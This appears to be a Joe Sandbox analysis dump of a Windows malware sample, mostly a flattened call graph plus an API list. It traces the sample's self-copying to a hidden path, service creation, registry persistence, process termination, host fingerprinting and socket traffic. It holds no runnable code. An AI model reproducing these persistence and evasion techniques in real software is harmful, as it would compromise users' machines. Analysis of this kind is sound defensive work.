GetSystemTimeAsFileTime 9508->9516 9509->9489 9510 14958b 9510->9507 9511 142f90 2 API calls 9510->9511 9513 149651 9511->9513 9512 148b61 Sleep 9512->9521 9936 14d500 lstrlen 9513->9936 9515 149666 MessageBoxA 9526 151bb0 2 API calls 9515->9526 9516->9503 9516->9508 9517 148c99 Sleep 9516->9517 9516->9521 9525 148cd8 9516->9525 9517->9516 9519 149952 WSAStartup 9524 1499b6 9519->9524 9520 1498a8 9520->9519 9521->9506 9521->9512 9521->9516 9522 152120 6 API calls 9522->9525 9529 142f90 2 API calls 9524->9529 9532 1499ff 9524->9532 9525->9522 9527 148de6 9525->9527 9531 148d67 9525->9531 9528 1496ef 9526->9528 9907 151530 9527->9907 9534 142800 ExitProcess 9528->9534 9530 1499e4 9529->9530 9937 14c540 9530->9937 9531->9525 9531->9527 9894 14bbc0 9531->9894 9537 149a23 9532->9537 9538 149a7b 9532->9538 9534->9507 9942 15ee80 9537->9942 9545 149aa3 CloseHandle SetFileAttributesA CopyFileA 9538->9545 9555 149d65 9538->9555 9539 148e04 9543 1491a4 9539->9543 9544 148e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9539->9544 9540 148d8c Sleep 9540->9531 9542 149a32 9546 149a53 9542->9546 9550 142800 ExitProcess 9542->9550 9557 16fa80 3 API calls 9543->9557 9547 142f90 2 API calls 9544->9547 9548 149c78 9545->9548 9549 149b1a SetFileAttributesA 9545->9549 9953 1426e0 9546->9953 9562 148eff 9547->9562 9560 163110 WaitForSingleObject 9548->9560 9552 149b73 9549->9552 9553 149b5d 9549->9553 9550->9546 9561 149c2a Sleep 9552->9561 9973 157a50 9552->9973 9961 150500 OpenSCManagerA 9553->9961 9567 149e57 SetFileAttributesA CopyFileA SetFileAttributesA 9555->9567 9568 149de9 9555->9568 9839 152120 9555->9839 9559 149210 9557->9559 9563 142800 ExitProcess 9559->9563 9564 149d15 9560->9564 9566 16fa80 3 API calls 9561->9566 9569 151bb0 2 API calls 9562->9569 9563->9460 9574 142800 ExitProcess 9564->9574 9566->9548 9850 14e430 9567->9850 9571 14bbc0 9 API calls 9568->9571 9573 148f61 9569->9573 9575 149e1a Sleep 9571->9575 9578 142f90 2 API calls 9573->9578 9588 14904a 
9573->9588 9574->9555 9575->9555 9575->9567 9583 148fbf 9578->9583 9579 149113 SetFileAttributesA 9579->9543 9580 14913d SetFileAttributesA 9580->9543 9581 142f90 2 API calls 9584 149efd 9581->9584 9585 151bb0 2 API calls 9583->9585 9586 142f90 2 API calls 9584->9586 9585->9588 9587 149fbe 9586->9587 9589 151bb0 2 API calls 9587->9589 9588->9579 9588->9580 9590 14a039 9589->9590 9855 150dc0 9590->9855 9592 14a050 9593 151bb0 2 API calls 9592->9593 9594 14a06b 9593->9594 9859 151200 9594->9859 9597 142f90 2 API calls 9598 14a0ae 9597->9598 9599 142f90 2 API calls 9598->9599 9600 14a0c6 9599->9600 9882 175820 9600->9882 9602 14a0f2 9603 151bb0 2 API calls 9602->9603 9604 14a115 9603->9604 9605 151bb0 2 API calls 9604->9605 9606 14a127 9605->9606 9885 16fa80 9606->9885 9608 14a185 9609 14a24e CreateThread 9608->9609 9610 14a2a2 9609->9610 9611 14a2cd 9609->9611 10262 1622a0 9609->10262 9890 14c660 StartServiceCtrlDispatcherA 9610->9890 9613 14a310 Sleep 9611->9613 9613->9613 9615 175186 GetSystemTime 9614->9615 9616 175172 9614->9616 9617 1751be 9615->9617 9616->9615 9618 1708b0 GetSystemTimeAsFileTime 9617->9618 9619 1752a7 GetTickCount 9618->9619 9620 1752d4 9619->9620 9620->9437 9622 15521d 9621->9622 9623 1552b2 GetVersionExA 9622->9623 9983 14b7a0 AllocateAndInitializeSid 9623->9983 9629 142f90 2 API calls 9630 155652 9629->9630 10005 14d530 9630->10005 9633 151bb0 2 API calls 9638 155692 9633->9638 9634 155496 CreateDirectoryA 9636 142f90 2 API calls 9634->9636 9635 155357 9635->9634 9637 1554bb 9636->9637 9639 151bb0 2 API calls 9637->9639 10009 151d90 9638->10009 9642 15550a 9639->9642 9641 1556cb 9643 1556d6 DeleteFileA RemoveDirectoryA 9641->9643 9644 15575d 9641->9644 9642->9629 9643->9644 9645 14f0d0 6 API calls 9644->9645 9646 155776 9645->9646 9647 15581e CreateDirectoryA 9646->9647 9648 15585b 9647->9648 9649 14e430 lstrlen 9648->9649 9650 1558cb CreateDirectoryA 9649->9650 9651 155917 9650->9651 9652 142f90 2 API calls 9651->9652 9653 15592d 9652->9653 
9654 142f90 2 API calls 9653->9654 9655 1559e9 9654->9655 9656 151bb0 2 API calls 9655->9656 9657 155a07 9656->9657 9658 14d530 9 API calls 9657->9658 9659 155a77 9658->9659 9660 151bb0 2 API calls 9659->9660 9661 155aaa 9660->9661 9662 151d90 5 API calls 9661->9662 9663 155ad7 9662->9663 9664 1564f5 9663->9664 9665 155b07 9663->9665 9666 155c42 9663->9666 9669 14e430 lstrlen 9664->9669 9668 142f90 2 API calls 9665->9668 9667 142f90 2 API calls 9666->9667 9670 155c61 9667->9670 9671 155b2d 9668->9671 9672 156549 SetFileAttributesA 9669->9672 9673 175820 wvsprintfA 9670->9673 9674 175820 wvsprintfA 9671->9674 9679 15657e 9672->9679 9675 155c87 9673->9675 9676 155b5a 9674->9676 9677 151bb0 2 API calls 9675->9677 9678 151bb0 2 API calls 9676->9678 9681 155b9f 9677->9681 9678->9681 9679->9450 9680 155bea 9682 155d53 CreateDirectoryA 9680->9682 9681->9680 9683 155d9a 9682->9683 9684 14e430 lstrlen 9683->9684 9685 155e4f CreateDirectoryA 9684->9685 9686 142f90 2 API calls 9685->9686 9687 155e9e 9686->9687 9688 142f90 2 API calls 9687->9688 9689 155f4c 9688->9689 9690 151bb0 2 API calls 9689->9690 9691 155f68 9690->9691 9692 14d530 9 API calls 9691->9692 9693 155f86 9692->9693 9694 151bb0 2 API calls 9693->9694 9695 155fcf 9694->9695 9696 151d90 5 API calls 9695->9696 9697 156002 9696->9697 9698 156485 9697->9698 9699 15600d GetTempPathA 9697->9699 9698->9664 10025 14d500 lstrlen 9699->10025 9701 15604f 9702 14e430 lstrlen 9701->9702 9703 1561cb CreateDirectoryA 9702->9703 9705 156219 9703->9705 9706 142f90 2 API calls 9705->9706 9707 156237 9706->9707 9708 142f90 2 API calls 9707->9708 9709 1562be 9708->9709 9710 151bb0 2 API calls 9709->9710 9711 156302 9710->9711 9712 14d530 9 API calls 9711->9712 9713 156360 9712->9713 9714 151bb0 2 API calls 9713->9714 9715 156372 9714->9715 9716 151d90 5 API calls 9715->9716 9717 1563b5 9716->9717 9717->9698 9718 1563c0 GetTempPathA 9717->9718 9719 1563ff 9718->9719 9720 142f90 2 API calls 9719->9720 9721 15642d 9720->9721 9722 
151bb0 2 API calls 9721->9722 9722->9698 10061 14d500 lstrlen 9723->10061 9725 16b9c3 9725->9466 9726->9472 9728 14a53c 9727->9728 9729 14a54e CharLowerBuffA 9727->9729 9728->9729 9729->9476 9731 163d35 9730->9731 9732 14e430 lstrlen 9731->9732 9733 163d66 9732->9733 9734 142f90 2 API calls 9733->9734 9735 163d82 9734->9735 9736 151bb0 2 API calls 9735->9736 9737 163dd1 CreateFileA 9736->9737 9738 163e32 9737->9738 9738->9491 9740 169b93 9739->9740 9741 169c40 GetComputerNameA 9740->9741 9742 169c53 9741->9742 9743 169cbb 9741->9743 9744 142f90 2 API calls 9742->9744 9745 142f90 2 API calls 9743->9745 9746 169c7e 9744->9746 9747 169d55 9745->9747 9748 151bb0 2 API calls 9746->9748 9749 151bb0 2 API calls 9747->9749 9748->9743 9750 169db1 9749->9750 9751 14d530 9 API calls 9750->9751 9752 169dd5 9751->9752 10062 152c30 9752->10062 9754 169e08 10065 15a930 9754->10065 9756 169f23 10107 14d500 lstrlen 9756->10107 9758 169f65 10108 1701a0 9758->10108 9762 169fcf 9763 152c30 8 API calls 9762->9763 9764 169ffe 9763->9764 9765 1701a0 9 API calls 9764->9765 9766 16a0a3 9765->9766 9767 171050 8 API calls 9766->9767 9768 16a0b2 9767->9768 9769 152c30 8 API calls 9768->9769 9770 16a0dd 9769->9770 9771 1701a0 9 API calls 9770->9771 9772 16a118 9771->9772 9773 171050 8 API calls 9772->9773 9774 16a127 9773->9774 9775 152c30 8 API calls 9774->9775 9776 16a16c 9775->9776 9777 1701a0 9 API calls 9776->9777 9778 16a18b 9777->9778 9779 171050 8 API calls 9778->9779 9780 16a197 9779->9780 9781 152c30 8 API calls 9780->9781 9782 16a1e1 9781->9782 9783 1701a0 9 API calls 9782->9783 9784 16a204 9783->9784 9785 171050 8 API calls 9784->9785 9786 16a213 9785->9786 9787 152c30 8 API calls 9786->9787 9788 16a248 9787->9788 9789 142f90 2 API calls 9788->9789 9790 16a280 9789->9790 9791 1701a0 9 API calls 9790->9791 9792 16a2bf 9791->9792 9793 171050 8 API calls 9792->9793 9794 16a2ce 9793->9794 9795 151bb0 2 API calls 9794->9795 9796 16a2f5 9795->9796 9797 152c30 8 API calls 9796->9797 9798 
16a31b 9797->9798 9799 1701a0 9 API calls 9798->9799 9800 16a347 9799->9800 9801 171050 8 API calls 9800->9801 9802 16a353 9801->9802 9803 152c30 8 API calls 9802->9803 9804 16a391 9803->9804 9805 1701a0 9 API calls 9804->9805 9806 16a3aa 9805->9806 9807 171050 8 API calls 9806->9807 9808 16a3b9 9807->9808 9809 152c30 8 API calls 9808->9809 9810 16a402 9809->9810 10115 152f60 9810->10115 9814 16a465 9815 1701a0 9 API calls 9814->9815 9816 16a471 9815->9816 9817 171050 8 API calls 9816->9817 9818 16a480 9817->9818 9819 152c30 8 API calls 9818->9819 9820 16a4d1 9819->9820 9821 1701a0 9 API calls 9820->9821 9822 16a502 9821->9822 9823 171050 8 API calls 9822->9823 9824 16a511 9823->9824 10124 1597b0 9824->10124 9826 16a54f 10151 15d990 9826->10151 9828 16a575 10154 154290 9828->10154 9830 16a5b3 10158 160480 9830->10158 9832 16a63b 9832->9497 9834 170958 __aulldiv 9833->9834 9834->9499 9836 164926 9835->9836 10195 14d500 lstrlen 9836->10195 9838 164948 9838->9520 9840 152196 CreateToolhelp32Snapshot 9839->9840 9841 15218c 9839->9841 9842 1521fe Process32First 9840->9842 9843 152450 9840->9843 9841->9840 9845 15240d FindCloseChangeNotification 9842->9845 9846 15227a 9842->9846 9843->9555 9845->9843 9847 14a4e0 2 API calls 9846->9847 9848 152346 Process32Next 9846->9848 9849 15239c 9846->9849 9847->9846 9848->9846 9848->9849 9849->9845 9851 1648d0 lstrlen 9850->9851 9852 14e451 9851->9852 9853 149ee1 9852->9853 10196 14d500 lstrlen 9852->10196 9853->9581 9856 150de7 9855->9856 9857 150f4e CreateFileA 9856->9857 9858 150f80 9857->9858 9858->9592 9860 151254 9859->9860 9861 15126b 9859->9861 9862 150920 9 API calls 9860->9862 9863 142f90 2 API calls 9861->9863 9862->9861 9864 1512b3 9863->9864 9865 150dc0 CreateFileA 9864->9865 9866 1512cd 9865->9866 9867 151bb0 2 API calls 9866->9867 9868 15131f 9867->9868 9869 151378 Sleep 9868->9869 9881 151420 9868->9881 9870 142f90 2 API calls 9869->9870 9873 1513b7 9870->9873 9871 151464 10197 1510e0 9871->10197 9872 14a090 
9872->9597 9875 150dc0 CreateFileA 9873->9875 9877 1513cc 9875->9877 9876 15147c 10202 175370 CloseHandle 9876->10202 9879 151bb0 2 API calls 9877->9879 9879->9881 9880 1514a0 9880->9872 9881->9871 9881->9872 9883 17587d wvsprintfA 9882->9883 9884 17586d 9882->9884 9883->9602 9884->9883 9886 16faaa 9885->9886 9887 16fb6a CreateProcessA 9886->9887 9888 16fc8f 9887->9888 9889 16fbff CloseHandle CloseHandle 9887->9889 9888->9608 9889->9608 9890->9611 9892 14281d 9891->9892 9893 14283e ExitProcess 9892->9893 9895 14bbe1 CreateToolhelp32Snapshot 9894->9895 9897 14bf47 9895->9897 9898 14bcbb Process32First 9895->9898 9897->9540 9899 14bf1a CloseHandle 9898->9899 9900 14bd05 9898->9900 9899->9897 9901 14a4e0 2 API calls 9900->9901 9902 14bdbb OpenProcess 9900->9902 9903 14bedd Process32Next 9900->9903 9906 14be67 CloseHandle 9900->9906 9901->9900 9902->9900 9904 14be02 TerminateProcess 9902->9904 9903->9900 9905 14bf19 9903->9905 9904->9900 9904->9906 9905->9899 9906->9900 9908 151561 9907->9908 9909 15157f CreateFileA 9907->9909 9908->9909 9910 151611 9909->9910 9911 151657 9910->9911 9912 151673 GetFileTime 9910->9912 9911->9539 9913 151694 CloseHandle 9912->9913 9914 1516bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9912->9914 9913->9539 9915 151771 GetFileSize CloseHandle 9914->9915 9916 1517be 9915->9916 9916->9539 9918 158a95 9917->9918 10204 14ca40 9918->10204 9920 158b1d 9921 16fa80 3 API calls 9920->9921 9922 158b65 9921->9922 9922->9504 9924 1695a9 9923->9924 9932 169902 9923->9932 10242 14d500 lstrlen 9924->10242 9926 16965d Sleep 9927 1696b9 9926->9927 9928 142f90 2 API calls 9927->9928 9929 1696e9 9928->9929 9930 151bb0 2 API calls 9929->9930 9931 16979d FindFirstFileA 9930->9931 9933 1697d6 9931->9933 9932->9510 9933->9932 9934 169877 DeleteFileA FindNextFileA 9933->9934 9934->9933 9935 1698d9 FindClose 9934->9935 9935->9932 9936->9515 9938 163110 WaitForSingleObject 9937->9938 9939 14c562 9938->9939 9940 142800 ExitProcess 9939->9940 9941 14c578 9940->9941 
9943 15ee9d 9942->9943 9944 14e430 lstrlen 9943->9944 9945 15eef8 9944->9945 9946 142f90 2 API calls 9945->9946 9947 15ef29 9945->9947 9948 15ef91 9946->9948 9947->9542 9949 151bb0 2 API calls 9948->9949 9950 15f001 9949->9950 10243 14d000 9950->10243 9952 15f020 9952->9542 9954 1708b0 GetSystemTimeAsFileTime 9953->9954 9955 142703 9954->9955 9956 1427c8 9955->9956 9957 1708b0 GetSystemTimeAsFileTime 9955->9957 9956->9538 9959 142751 9957->9959 9958 142770 Sleep 9958->9959 9959->9956 9959->9958 9960 1708b0 GetSystemTimeAsFileTime 9959->9960 9960->9959 9962 15055f CreateServiceA 9961->9962 9963 1507be 9961->9963 9964 1505be 9962->9964 9963->9552 9965 1506bc OpenServiceA 9964->9965 9966 1505d8 ChangeServiceConfig2A StartServiceA 9964->9966 9970 150716 StartServiceA CloseServiceHandle 9965->9970 9971 15075e CloseServiceHandle 9965->9971 9967 15067e CloseServiceHandle 9966->9967 9967->9971 9970->9971 9971->9963 9974 157ab7 9973->9974 9975 142f90 2 API calls 9974->9975 9976 157b71 RegOpenKeyA 9975->9976 9977 151bb0 2 API calls 9976->9977 9979 157bcb 9977->9979 9978 157cc0 RegCloseKey 9980 149c15 9978->9980 9979->9978 10261 14d500 lstrlen 9979->10261 9980->9561 9982 157c87 RegSetValueExA 9982->9978 9984 14b84e 9983->9984 9985 14b8ee 9984->9985 9986 14b86a CheckTokenMembership 9984->9986 9989 14fbc0 9985->9989 9987 14b8b4 FreeSid 9986->9987 9988 14b887 9986->9988 9987->9985 9988->9987 9990 14fc3c 9989->9990 9991 142f90 2 API calls 9990->9991 9992 14fc76 GetProcAddress 9991->9992 9993 151bb0 2 API calls 9992->9993 9994 14fcb4 9993->9994 9995 14fcc5 GetCurrentProcess 9994->9995 9996 14fcdc 9994->9996 9995->9996 9996->9642 9997 14f0d0 GetWindowsDirectoryA 9996->9997 9998 14f122 9997->9998 9999 14f1d3 9998->9999 10000 142f90 2 API calls 9998->10000 9999->9635 10001 14f170 10000->10001 10002 151bb0 2 API calls 10001->10002 10003 14f1bb 10002->10003 10026 14d500 lstrlen 10003->10026 10006 14d54a 10005->10006 10027 14fa50 10006->10027 10010 151d9d 10009->10010 10011 163110 
WaitForSingleObject 10010->10011 10012 151e0c 10011->10012 10013 151e23 10012->10013 10014 151e4c CreateFileA 10012->10014 10016 16fcc0 ReleaseMutex 10013->10016 10015 151e93 10014->10015 10020 151ed1 10014->10020 10017 16fcc0 ReleaseMutex 10015->10017 10018 151e39 10016->10018 10019 151eaf 10017->10019 10018->9641 10019->9641 10021 151fe8 WriteFile 10020->10021 10021->10020 10022 152069 FindCloseChangeNotification 10021->10022 10023 16fcc0 ReleaseMutex 10022->10023 10024 1520a1 10023->10024 10024->9641 10025->9701 10026->9999 10028 14fa7e 10027->10028 10033 14d500 lstrlen 10028->10033 10030 14fae4 10034 152df0 10030->10034 10032 14d55f 10032->9633 10033->10030 10037 15bff0 10034->10037 10036 152e3e 10036->10032 10038 15c006 10037->10038 10039 15c00d 10038->10039 10042 163f00 10038->10042 10039->10036 10041 15c04f 10041->10036 10043 163f30 10042->10043 10044 163f46 10043->10044 10046 150110 10043->10046 10044->10041 10047 150128 10046->10047 10048 15038a 10047->10048 10049 150266 10047->10049 10054 150367 10047->10054 10056 1568d0 10048->10056 10052 14e2c0 2 API calls 10049->10052 10051 1503a9 10051->10054 10053 150276 10052->10053 10055 152eb0 2 API calls 10053->10055 10054->10044 10055->10054 10057 156901 10056->10057 10058 156926 GetProcessHeap RtlReAllocateHeap 10057->10058 10059 156966 GetProcessHeap HeapAlloc 10057->10059 10058->10051 10059->10051 10061->9725 10063 154290 8 API calls 10062->10063 10064 152c4d 10063->10064 10064->9754 10066 15a998 10065->10066 10067 142f90 2 API calls 10066->10067 10068 15aa6c 10067->10068 10069 151bb0 2 API calls 10068->10069 10070 15aab7 GetProcessHeap 10069->10070 10071 15ab54 10070->10071 10072 15aaeb 10070->10072 10073 142f90 2 API calls 10071->10073 10072->9756 10074 15ab6a LoadLibraryA 10073->10074 10075 15abb1 10074->10075 10076 151bb0 2 API calls 10075->10076 10078 15abcb 10076->10078 10077 15abf6 10077->9756 10078->10077 10079 142f90 2 API calls 10078->10079 10080 15ac99 GetProcAddress 10079->10080 10081 151bb0 2 API 
calls 10080->10081 10082 15acd9 10081->10082 10083 15acf0 FreeLibrary 10082->10083 10084 15ad28 HeapAlloc 10082->10084 10083->9756 10085 15ad78 10084->10085 10086 15ada4 FreeLibrary 10085->10086 10087 15adfa GetAdaptersInfo 10085->10087 10086->9756 10088 15ae30 HeapFree 10087->10088 10089 15af4b GetAdaptersInfo 10087->10089 10091 15ae77 10088->10091 10092 15ae8a HeapAlloc 10088->10092 10097 15afa4 10089->10097 10106 15b22b 10089->10106 10091->10092 10093 15af24 10092->10093 10094 15aeaa FreeLibrary 10092->10094 10093->10089 10096 15aedf 10094->10096 10096->9756 10099 142f90 2 API calls 10097->10099 10098 15b6ad HeapFree FreeLibrary 10098->9756 10100 15affe 10099->10100 10101 151bb0 2 API calls 10100->10101 10102 15b074 10101->10102 10103 142f90 2 API calls 10102->10103 10102->10106 10104 15b249 10103->10104 10105 151bb0 2 API calls 10104->10105 10105->10106 10106->10098 10107->9758 10163 15a810 10108->10163 10111 171050 10112 171071 10111->10112 10113 154290 8 API calls 10112->10113 10114 17107f 10113->10114 10114->9762 10116 152f95 10115->10116 10117 142f90 2 API calls 10116->10117 10118 152fd0 10117->10118 10119 151bb0 2 API calls 10118->10119 10120 153030 10119->10120 10121 156600 10120->10121 10170 14d500 lstrlen 10121->10170 10123 156655 10123->9814 10125 1597e8 10124->10125 10126 142f90 2 API calls 10125->10126 10127 15987a 10126->10127 10128 142f90 2 API calls 10127->10128 10129 1598a9 10128->10129 10130 142f90 2 API calls 10129->10130 10131 1598d7 10130->10131 10132 151bb0 2 API calls 10131->10132 10133 159917 10132->10133 10134 142f90 2 API calls 10133->10134 10135 159955 10134->10135 10136 151bb0 2 API calls 10135->10136 10137 1599ab 10136->10137 10138 151bb0 2 API calls 10137->10138 10142 159a2b 10138->10142 10139 15a5a1 10140 151bb0 2 API calls 10139->10140 10144 15a606 10140->10144 10143 141ca0 9 API calls 10142->10143 10150 159f98 10142->10150 10171 156810 10142->10171 10143->10142 10144->9826 10145 15a428 10145->10139 10148 156810 8 API calls 
10145->10148 10174 141ca0 10145->10174 10146 156810 8 API calls 10146->10150 10148->10145 10149 141ca0 9 API calls 10149->10150 10150->10139 10150->10145 10150->10146 10150->10149 10152 15bff0 8 API calls 10151->10152 10153 15d997 10152->10153 10153->9828 10155 1542e3 10154->10155 10156 15bff0 8 API calls 10155->10156 10157 15432f 10156->10157 10157->9830 10185 164450 10158->10185 10160 1604ab 10161 154290 8 API calls 10160->10161 10162 160589 10160->10162 10161->10162 10162->9832 10164 15a81c 10163->10164 10169 14d500 lstrlen 10164->10169 10166 15a8a0 10167 152df0 8 API calls 10166->10167 10168 15a8ac 10167->10168 10168->10111 10169->10166 10170->10123 10180 151c30 10171->10180 10173 15681e 10173->10142 10175 14d5d0 10174->10175 10184 14d500 lstrlen 10175->10184 10177 14d630 10178 154290 8 API calls 10177->10178 10179 14d63c 10178->10179 10179->10145 10181 151c67 10180->10181 10182 15bff0 8 API calls 10181->10182 10183 151c89 10182->10183 10183->10173 10184->10177 10191 1700f0 10185->10191 10187 1644d7 10187->10160 10188 150920 9 API calls 10189 164475 10188->10189 10189->10187 10189->10188 10190 16457d 10189->10190 10190->10160 10192 170149 10191->10192 10193 17010b 10191->10193 10192->10189 10194 15d990 8 API calls 10193->10194 10194->10192 10195->9838 10196->9853 10198 151115 10197->10198 10199 151126 10197->10199 10198->9876 10200 151137 10199->10200 10201 15114e WriteFile 10199->10201 10200->9876 10201->9876 10203 1753d4 10202->10203 10203->9880 10205 14caa0 10204->10205 10206 14cae7 CreateFileA 10205->10206 10207 14cb3d ReadFile 10206->10207 10211 14cf5d 10206->10211 10208 14cbbc CloseHandle 10207->10208 10209 14cb79 10207->10209 10233 152a20 10208->10233 10209->10208 10211->9920 10212 14cbf5 GetTickCount 10235 171520 10212->10235 10214 14cc2a 10239 14d500 lstrlen 10214->10239 10216 14cc81 10217 142f90 2 API calls 10216->10217 10218 14ccd1 10217->10218 10219 151bb0 2 API calls 10218->10219 10220 14cd00 10219->10220 10222 142f90 2 API calls 10220->10222 10223 
14cddc CreateFileA 10220->10223 10225 14cd54 10222->10225 10223->10211 10224 14cef5 WriteFile 10223->10224 10226 14cf46 CloseHandle 10224->10226 10227 14cf32 10224->10227 10240 14d500 lstrlen 10225->10240 10226->10211 10227->10226 10229 14cd6c 10230 175820 wvsprintfA 10229->10230 10231 14cd77 10230->10231 10232 151bb0 2 API calls 10231->10232 10232->10223 10234 152a3b 10233->10234 10234->10212 10236 171546 10235->10236 10241 14d500 lstrlen 10236->10241 10238 1715bf 10238->10214 10239->10216 10240->10229 10241->10238 10242->9926 10245 14d00d 10243->10245 10244 15d990 8 API calls 10246 14d0dd 10244->10246 10245->10244 10247 163110 WaitForSingleObject 10246->10247 10248 14d0f2 CreateFileA 10247->10248 10249 14d140 10248->10249 10250 14d131 10248->10250 10253 14d1b9 ReadFile 10249->10253 10254 150110 8 API calls 10249->10254 10255 14d3e3 CloseHandle 10249->10255 10256 154290 8 API calls 10249->10256 10257 14d294 CloseHandle 10249->10257 10251 16fcc0 ReleaseMutex 10250->10251 10252 14d410 10251->10252 10252->9952 10253->10249 10254->10249 10255->10250 10256->10249 10259 16fcc0 ReleaseMutex 10257->10259 10260 14d322 10259->10260 10260->9952 10261->9982 10263 1622fb 10262->10263 10264 1750e0 3 API calls 10263->10264 10265 16247d 10264->10265 10266 169580 10 API calls 10265->10266 10267 1624c2 10266->10267 10268 14e430 lstrlen 10267->10268 10269 1624e6 10268->10269 10270 142f90 2 API calls 10269->10270 10271 162511 10270->10271 10272 151bb0 2 API calls 10271->10272 10277 162561 10272->10277 10273 1708b0 GetSystemTimeAsFileTime 10273->10277 10274 15d990 8 API calls 10275 162bec Sleep 10274->10275 10409 158cf0 10275->10409 10277->10273 10277->10274 10278 152120 6 API calls 10277->10278 10279 16fa80 3 API calls 10277->10279 10281 151200 13 API calls 10277->10281 10282 142f90 2 API calls 10277->10282 10294 164af0 10277->10294 10306 160d80 10277->10306 10278->10277 10279->10277 10281->10277 10282->10277 10284 14d760 52 API calls 10293 162730 10284->10293 10285 15d0f0 33 API 
[Execution-graph residue: flattened node and edge data from the sandbox's function call-graph view, not readable as text. Windows API calls named in the graph nodes: GetProcessHeap, RtlAllocateHeap, RtlFreeHeap, HeapAlloc, GetSystemTimeAsFileTime, lstrlen, wvsprintfA, socket, setsockopt, gethostbyname, inet_ntoa, inet_addr, htons, connect, send, recv, closesocket, DeleteFileA, GetStdHandle, GetModuleFileNameA, CreatePipe, SetHandleInformation, CreateProcessA, ReadFile, WriteFile, CloseHandle, WaitForSingleObject, SetEvent, ReleaseMutex, Sleep, GetProcAddress, CryptGenRandom, SetServiceStatus.]
APIs
• GetEnvironmentVariableA.KERNEL32(00000000,C:\Windows\system32\config\systemprofile,00000104), ref: 001483DA
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00148448
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 001484DC
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001484F7
• GetTickCount.KERNEL32 ref: 00148599
  • Part of subcall function 00155200: GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
• Sleep.KERNEL32(00000D05), ref: 00148B70
• Sleep.KERNEL32(000007D0), ref: 00148DAC
• GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00148E86
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00148E9F
• CopyFileA.KERNEL32(?,?,00000000), ref: 00148EC3
• SetFileAttributesA.KERNEL32(?,00000002), ref: 0014912B
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00149186
• GetCommandLineA.KERNEL32 ref: 00149265
• GetModuleFileNameA.KERNEL32(00000000,?), ref: 00149370
  • Part of subcall function 0014A4E0: lstrlen.KERNEL32(00152325,00000000,?,00152325,?), ref: 0014A4FE
  • Part of subcall function 0014A4E0: CharLowerBuffA.USER32(00152325,00000000,?,00152325,?), ref: 0014A550
  • Part of subcall function 0014D500: lstrlen.KERNEL32(?,?,0016965D,?,00000104,?,00000001), ref: 0014D523
• MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 001496D4
• WSAStartup.WS2_32(00000202,?), ref: 0014995E
• CloseHandle.KERNEL32(0000012C), ref: 00149AC8
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00149AEC
• CopyFileA.KERNEL32(?,?,00000000), ref: 00149B0C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00149B3B
• Sleep.KERNEL32(000003E8), ref: 00149C52
• Sleep.KERNEL32(000003E8), ref: 00148CB2
  • Part of subcall function 0014BBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
  • Part of subcall function 0014BBC0: Process32First.KERNEL32(00000000,?), ref: 0014BCE3
• GetCommandLineA.KERNEL32 ref: 001486AE
  • Part of subcall function 00142800: ExitProcess.KERNEL32 ref: 00142842
  • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,0016247D), ref: 00170929
  • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
• Sleep.KERNEL32(000007D0), ref: 00149E32
• SetFileAttributesA.KERNELBASE(C:\whfkpbh\amdrhfskpcu.exe,00000080), ref: 00149E88
• CopyFileA.KERNEL32(?,C:\whfkpbh\amdrhfskpcu.exe,00000000), ref: 00149EA6
• SetFileAttributesA.KERNELBASE(C:\whfkpbh\amdrhfskpcu.exe,00000002), ref: 00149EC5
                                                                                                                                                                                                              • Part of subcall function 00150500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
                                                                                                                                                                                                              • Part of subcall function 00150500: CreateServiceA.ADVAPI32(00000000,0113E608,0113E608,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
                                                                                                                                                                                                              • Part of subcall function 00150500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
                                                                                                                                                                                                              • Part of subcall function 00150500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 0014A26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 0014A327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
